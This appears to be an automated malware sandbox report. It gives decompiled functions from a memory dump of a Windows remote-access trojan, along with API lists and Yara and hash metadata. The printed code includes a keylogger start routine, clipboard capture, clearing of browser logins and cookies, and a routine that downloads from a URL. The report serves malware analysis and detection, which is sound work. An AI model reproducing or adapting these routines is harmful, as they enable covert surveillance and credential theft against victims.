                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                        • SystemParametersInfoW.USER32 ref: 00413580
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                        • API String ID: 3561681748-3576401099
                                        • Opcode ID: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                        • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                        • Opcode Fuzzy Hash: 505890f8fc329ebd808f43419e643c557b26f8c85ea391f63ec330bd5069d550
                                        • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412553, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 88%
                                        			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                        0x0041255b
                                        0x00412564
                                        0x00412568
                                        0x0041256c
                                        0x00412573
                                        0x0041257a
                                        0x0041257c
                                        0x0041258d
                                        0x00412591
                                        0x00412599
                                        0x0041259c
                                        0x004125a3
                                        0x004125a6
                                        0x004125a9
                                        0x004125a9
                                        0x004125bc
                                        0x004125c4
                                        0x00000000
                                        0x00000000
                                        0x004125cd
                                        0x004125d0
                                        0x004125d1
                                        0x004125d6
                                        0x004125d8
                                        0x004125df
                                        0x004125e6
                                        0x004125ec
                                        0x004125ef
                                        0x004125fa
                                        0x00412600
                                        0x0041260a
                                        0x0041260a
                                        0x0041260c
                                        0x00412615
                                        0x0041261b
                                        0x0041261e
                                        0x0041261e
                                        0x00412622
                                        0x00412624
                                        0x0041262a
                                        0x00412632
                                        0x00412638
                                        0x00412642
                                        0x00412644
                                        0x00412648
                                        0x00412652
                                        0x00412657
                                        0x0041265f

                                        APIs
                                        • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                        • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                        • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                        • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                        • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                        • InternetCloseHandle.WININET(?), ref: 00412652
                                        • InternetCloseHandle.WININET(00000000), ref: 00412657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                        • String ID: dVA$user
                                        • API String ID: 3314639739-756348157
                                        • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                        • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                        • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004078BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E00407A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E0041203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E004020C2(0x41be70, 0xaf, 0x415664);
				if( *0x41b9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E0040B829(0x80000001, _t40, "FR", 1);
				}
				 *0x41b9b8 =  *0x41b9b8 & 0x00000000;
				return 0;
			}









                                        0x004078be
                                        0x004078cd
                                        0x004078d4
                                        0x004078d6
                                        0x004078da
                                        0x004078de
                                        0x004078e2
                                        0x004078e6
                                        0x004078e8
                                        0x004078ec
                                        0x004078ee
                                        0x004078f3
                                        0x004078f3
                                        0x004078fa
                                        0x00407901
                                        0x00407901
                                        0x00407908
                                        0x0040790f
                                        0x0040790f
                                        0x00407916
                                        0x0040791d
                                        0x0040791d
                                        0x00407922
                                        0x00407929
                                        0x00407929
                                        0x0040792f
                                        0x0040794c
                                        0x0040794c
                                        0x00407952
                                        0x00000000
                                        0x00000000
                                        0x00407954
                                        0x0040797c
                                        0x00407982
                                        0x00407992
                                        0x004079a6
                                        0x004079ac
                                        0x004079bf
                                        0x004079cf
                                        0x004079db
                                        0x004079e9
                                        0x004079f5
                                        0x004079fa
                                        0x004079fd
                                        0x00407a09

                                        APIs
                                        • Sleep.KERNEL32 ref: 004078D4
                                        • Sleep.KERNEL32(00001388), ref: 0040794C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 0040797C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 00407992
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004079A6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004079BF
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041601C,00000001,000000AF), ref: 004079E9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,73B76490,00000000), ref: 00407779
                                          • Part of subcall function 00407767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077A1
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004077AA
                                          • Part of subcall function 00407767: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 004077B9
                                          • Part of subcall function 00407767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
                                          • Part of subcall function 00407767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                        Strings
                                        • [INFO], xrefs: 004079A1
                                        • Cleared browsers logins and cookies., xrefs: 0040798D
                                        • [Cleared browsers logins and cookies.], xrefs: 00407977
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@D@1@@$??1?$basic_string@Sleep$??4?$basic_string@??8std@@?c_str@?$basic_string@D@2@@0@V01@V01@@V?$basic_string@
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[INFO]
                                        • API String ID: 3797260644-945983296
                                        • Opcode ID: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction ID: 70147e8437466b13765d015bb4740f5a08e73b30c638215b5aa9753a2d15767b
                                        • Opcode Fuzzy Hash: 45270c95517eca423c77cf062f5531907de28195bb0046b705c141155823f916
                                        • Instruction Fuzzy Hash: 733146B1D5D28879FB11F3E5890ABED7EA48B51354F1880ABD840222D2C7BD1A88D35B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00407B8C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 80COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 29%
                                        			E00407B8C(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				char* _t29;
				void* _t38;
				intOrPtr _t49;
				void* _t50;
				void* _t53;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t49 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t53 = _t50 + 0x24;
				_t19 = _t49 - 0x42;
				if(_t19 == 0) {
					_t20 = E0040180C( &_v20, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t21 = E00406DD9(_t20);
					__eflags = _t21;
					_pop(_t38);
					if(_t21 != 0) {
						_t24 = E00407033(_t21, "FunFunc");
						_push(_t38);
						 *0x41ba18 = _t24;
						 *0x41ba1c = 1;
						E00412855(_t38, _t53, 0x41bcf8);
						E004020C2(_a4, 0x6d, _t38);
					}
				} else {
					_t56 = _t19 == 1;
					if(_t19 == 1) {
						_t29 = E0040180C( &_v20, _t56, 0);
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						 *0x41ba18(atoi(_t29));
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}














                                        0x00407b96
                                        0x00407b9c
                                        0x00407bae
                                        0x00407bbe
                                        0x00407bcd
                                        0x00407bd7
                                        0x00407bde
                                        0x00407be1
                                        0x00407be4
                                        0x00407c12
                                        0x00407c19
                                        0x00407c20
                                        0x00407c25
                                        0x00407c27
                                        0x00407c28
                                        0x00407c30
                                        0x00407c35
                                        0x00407c37
                                        0x00407c44
                                        0x00407c4b
                                        0x00407c57
                                        0x00407c57
                                        0x00407be6
                                        0x00407be6
                                        0x00407be7
                                        0x00407bee
                                        0x00407bf5
                                        0x00407c03
                                        0x00407c0a
                                        0x00407be7
                                        0x00407c5f
                                        0x00407c67
                                        0x00407c70
                                        0x00407c7a

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00407B96
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 00407BAE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00407BBE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407BCD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407BF5
                                        • atoi.MSVCRT ref: 00407BFC
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407C19
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006D,?,?,00000000,FunFunc), ref: 00407C67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,00000000,FunFunc), ref: 00407C70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@?length@?$basic_string@V01@@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@D@1@@V01@atoi
                                        • String ID: FunFunc
                                        • API String ID: 2980839617-81400306
                                        • Opcode ID: d4a57ff5cab0d8d4531b816436e077c30061a511b52593480f77deb3233660ff
                                        • Instruction ID: 99ba8aa056b8c4f8b9d909233289e7e9d1b022cfe78e0840cace3255d8d2923c
                                        • Opcode Fuzzy Hash: d4a57ff5cab0d8d4531b816436e077c30061a511b52593480f77deb3233660ff
                                        • Instruction Fuzzy Hash: 1A21A271A042099BCB04FBB5EC1A9EE3768EF44344F00403AF512E71E0EF789540CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405180, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 71threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 26%
                                        			E00405180(void* __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _t14;
				void* _t18;
				void* _t19;
				void* _t29;
				void* _t32;
				char* _t33;
				void* _t36;

				_t19 = __ecx;
				 *((char*)(__ecx + 0x3c)) = 1;
				__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z( &_a4, _t29, _t32, _t18, __ecx);
				E00405156(__ecx);
				_t33 = "Offline Keylogger Started";
				if( *0x41b154 != 0x32) {
					_t36 = _t36 - 0x10;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
					E00405DD3(__ecx);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t33,  &_v5);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("[INFO]",  &_v6);
				E0041203B();
				CreateThread(0, 0, E0040528A, _t19, 0, 0);
				if( *_t19 == 0) {
					CreateThread(0, 0, E0040526A, _t19, 0, 0);
				}
				_t14 = CreateThread(0, 0, E00405299, _t19, 0, 0);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t14;
			}












                                        0x00405185
                                        0x00405190
                                        0x00405194
                                        0x0040519c
                                        0x004051a8
                                        0x004051ad
                                        0x004051af
                                        0x004051b9
                                        0x004051c1
                                        0x004051c1
                                        0x004051d0
                                        0x004051e4
                                        0x004051ea
                                        0x00405204
                                        0x00405208
                                        0x00405214
                                        0x00405214
                                        0x00405220
                                        0x00405225
                                        0x0040522f

                                        APIs
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                          • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                          • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                          • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                          • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                          • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                          • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                          • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                          • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                          • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                          • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                          • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                          • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                        • CreateThread.KERNEL32(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                        • CreateThread.KERNEL32(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                        • CreateThread.KERNEL32(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                        • String ID: Offline Keylogger Started$[INFO]
                                        • API String ID: 2375278975-3749928830
                                        • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                        • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                        • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00406C35, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E00406C35(void* __ecx) {
				char _v5;
				char _v24;
				char _v40;
				char* _t13;
				void* _t18;
				void* _t34;

				_t18 = __ecx;
				if(( *0x41b8f8 & 0x00000001) == 0) {
					 *0x41b8f8 =  *0x41b8f8 | 0x00000001;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
					E00413E72(E00406CF4);
				}
				E00406BEF(_t18,  &_v24);
				_t13 =  &_v24;
				__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t13, 0x41b8e8);
				if(_t13 == 0) {
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v24);
					_t13 =  &_v24;
					__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t13, 0x415664);
					if(_t13 != 0) {
						L00414176();
						L00414170();
						_t13 = E004054E9(_t18, _t34 - 0x10,  &_v40,  &_v40, "\r\n[Following text has been copied to clipboard:]\r\n", 0x41b8e8);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ("\r\n[End of clipboard text]\r\n", 0);
					}
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t13;
			}









                                        0x00406c45
                                        0x00406c4c
                                        0x00406c4e
                                        0x00406c5b
                                        0x00406c66
                                        0x00406c6b
                                        0x00406c72
                                        0x00406c7c
                                        0x00406c81
                                        0x00406c8b
                                        0x00406c93
                                        0x00406c99
                                        0x00406ca2
                                        0x00406cac
                                        0x00406cc4
                                        0x00406cce
                                        0x00406cd8
                                        0x00406ce0
                                        0x00406ce0
                                        0x00406cac
                                        0x00406ce9
                                        0x00406cf3

                                        APIs
